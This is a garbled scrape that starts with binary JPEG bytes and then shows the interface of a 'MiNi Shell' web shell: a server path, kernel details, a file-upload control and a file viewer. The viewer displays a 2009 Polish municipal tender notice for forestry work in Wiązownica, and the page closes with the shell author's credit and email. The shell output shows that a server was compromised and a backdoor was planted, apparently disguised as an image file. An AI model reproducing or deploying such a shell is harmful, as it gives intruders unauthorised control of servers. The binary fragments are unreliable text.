JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090130/12954-N-2009.html

<p class="kh_header"><b>Wiązownica: Wykonawstwo prac z zakresu hodowli lasu z dostawą sadzonek, ochrony lasu, użytkowania lasu, zrywki drewna na terenie lasów komunalnych Gminy Wiązownica</b><br>
<b>Numer ogłoszenia: 12954 - 2009; data zamieszczenia: 30.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Wiązownica , 37-522 Wiązownica, woj. podkarpackie, tel. 016 622-36-31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiazownica.regiony.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.wiazownica.com lub www.bip-wiazownica.e-zet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonawstwo prac z zakresu hodowli lasu z dostawą sadzonek, ochrony lasu, użytkowania lasu, zrywki drewna na terenie lasów komunalnych Gminy Wiązownica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie prac z zakresu hodowli lasu z dostawą sadzonek, ochrony lasu, użytkowania lasu, zrywki drewna na terenie lasów komunalnych Gminy Wiązownica.
W ramach zamówienia planuje się wykonanie następujących prac z zakresu hodowli, użytkowania i ochrony lasu
- melioracje agrotechniczne,
- przygotowanie gleby,
- sadzenie,
- pielęgnacja upraw,
- pozyskanie drewna,
- ścinka drewna,
- remonty szlaków,
- grodzenie mrowisk,
- czyszczenie budek,
- likwidacja nielegalnych wjazdów.
Szczegółowy przedmiot zamówienia określony został w przedmiarze robót stanowiącym zał. nr 2.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie będzie wymagał wniesienia wadium przetargowego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W  przetargu  mogą   wziąć  udział  wykonawcy  nie wykluczeni na podstawie art. 24 ust.  1  i 2  oraz  spełniający  wymogi   art. 22  ust. 1  ustawy  Prawo Zamówień Publicznych i warunki dodatkowe określone w SIWZ.
1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności,  
      jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
1.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem  
      technicznym  i  osobami zdolnymi do wykonania zamówienia lub przedstawią 
      pisemne zobowiązanie  innych podmiotów do udostępnienia potencjału 
      technicznego i osób zdolnych do  wykonania zamówienia;	
      - udokumentują wykonanie co najmniej 1 usługi  z zakresu hodowli, ochrony,  
        użytkowania lasu w okresie ostatnich 3 lat, a jeżeli  okres działalności jest 
        krótszy, to w tym okresie.  
      - dysponuje co najmniej 2 osobami  - operatorów pilarek spalinowych z 
        uprawnieniami;
      - dysponują  min. 1 szt. pługiem leśnym LPZ;   
1.3.    znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
       zamówienia;
1.4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
Ocena spełniania warunków udziału w postępowaniu będzie prowadzona w oparciu o przedłożone dokumenty i oświadczenia  na zasadzie  spełnia/ nie spełnia.
Z ubiegania się o udzielenie zamówienia publicznego wyklucza się:
Wykonawców, którzy nie spełniają warunków o których mowa w art. 24 ust. 1 ustawy Prawo  zamówień publicznych, oraz wykonawców którzy;
1.wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego 
  postępowania, lub posługiwali się w celu sporządzenia oferty osobami  
  uczestniczącymi  w dokonywaniu tych czynności, chyba że udział tych 
  wykonawców w postępowaniu nie utrudni uczciwej konkurencji;
2. złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego     
   postępowania;
3. nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub  
   dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty 
   zawierają   błędy, z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.
4. nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub 
    nie zgodzili się na przedłużenie okresu związania ofertą - jeżeli było wymagane..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania działalności lub czynności oraz nie  podlega wykluczeniu na podstawie art. 24ust. 1 i 2 ustawy z dnia 29 stycznia  2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty określone w rozporządzeniu Prezesa Rady Ministrów  w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty  mogą być składane, a  w szczególności: 
1.1. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.2. aktualne zaświadczenie  właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat, lub zaświadczenie, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionego nie wcześniej niż 3 miesiące  przed upływem terminu  składania ofert;
1.3. aktualne zaświadczenie  właściwego oddziału ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionego nie wcześniej niż 3 miesiące  przed upływem terminu  składania ofert; 
1.4. oświadczenie do postępowania o zamówienie publiczne z art. 22 ust.1 i 24 ust. 1 i 2  ustawy Prawo zamówień publicznych z wykorzystaniem wzoru- załącznik nr 4.

2. W celu potwierdzenia , że wykonawca posiada niezbędną wiedzę i doświadczenie oraz  dysponuje potencjałem  technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia wykonawca składa następujące dokumenty:  
2.1. wykaz wykonanych w okresie ostatnich 3 lat  przed dniem wszczęcia postępowania usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i  wartością usługom  stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów (referencje Inwestorów) potwierdzających,  że roboty te zostały wykonane należycie; zał. nr 6
2.2. wykazu osób którymi dysponuje lub będzie dysponował wykonawca i które będą  uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych , doświadczenia i wykształcenia niezbędnych do wykonania  zamówienia a także zakresu wykonywanych przez nich czynności zał. nr 5
2.3. pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa w pkt. 2.2.  wykonawca wskazał, którymi będzie dysponował.
2.4. wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca; 
2.5. pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt. 2.4.  wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.
2.6. dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich  uprawnień; - do  wykazu należy dołączyć  następujące dokumenty potwierdzające posiadanie przez wskazane osoby uprawnienia:
       2.6.1. zaświadczenie o ukończeniu kursu zawodowego operatora pilarek 
                spalinowych.
       
3. W celu potwierdzenia, że  wykonawca znajduje się w sytuacji ekonomicznej i finansowej  zapewniającej wykonanie zamówienia, wykonawca składa następujące dokumenty:
3.2. polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  działalności oraz  pozostałe niezbędne dokumenty:
- formularz ofertowy z wykorzystaniem wzoru- załącznik nr 1;
- kosztorys ofertowy szczegółowy- zał. Nr 2
- parafowany projekt umowy  - zał. nr 3,
- pełnomocnictwo w przypadku wspólnego ubiegania się o udzielenie zamówienia.

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych  za zgodność z oryginałem przez  osoby uprawnioną do reprezentowania wykonawcy  we właściwym rejestrze lub ewidencji działalności gospodarczej .
4. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w dziale IX pkt. 1 ppkt. 1.1. - 1.3. składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie; 
3) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty o których mowa w pkt. 1 i 2   powinny być wystawione nie wcześniej  niż 6 miesięcy przed upływem terminu do składania ofert, natomiast dokument wymieniony w pkt. 3  powinien zostać wystawiony nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.

5. Wykonawcy wspólnie ubiegający  się o udzielenie zamówienia: 
5.1.W przypadku wspólnego ubiegania się o udzielenie zamówienia publicznego (konsorcjum) wykonawcy są  zobowiązani ustanowić pełnomocnika -lidera- do reprezentowania ich w  postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy, które winno  zostać dołączone do oferty przetargowej.
5.2.Upoważnienie do pełnienia funkcji  PEŁNOMOCNIKA wymaga podpisu prawnie  
      upoważnionych przedstawicieli każdego z partnerów w oryginale lub kopii  - które należy również załączyć je do oferty; 
5.3.Treść pełnomocnictwa powinna dokładnie określać zakres  udzielonego pełnomocnictwa.
5.4.Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia musi spełnić warunki  udziału w postępowaniu określone w dziale VIII. W pkt. 1.1 i 1.4  i złożyć na  potwierdzenie spełniania tych warunków dokumenty wymienione w Dziale IX  w oryginale lub kopii  potwierdzone za  zgodność z  oryginałem.
5.5.Warunki udziału w postępowaniu o udzielenie zamówienia publicznego  opisane w Dziale VIII pkt. 1.2 i 1.3.   wykonawcy  mogą spełniać  wspólnie.
5.6.Ponadto  Pełnomocnik podpisuje także Formularz oferty , kosztorys zał. nr 2, wykaz wykonanych usług - zał. nr 6,  wykaz  osób i podmiotów - zał. nr 5 , wykaz narzędzi i urządzeń i pozostałe dokumenty wymagane SIWZ.
5.7.Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za  niewykonanie lub nienależyte wykonanie zobowiązań..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wiazownica.com lub www.bip-wiazownica.e-zet.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wiązownica
37-522 Wiązownica
pok. nr 42  II p.
Kwota SIWZ  20 zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2009 godzina 09:00, miejsce: Sekretariat Urzędu Gminy Wiązownica
37-522 Wiązownica
pok. nr 22   I p..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com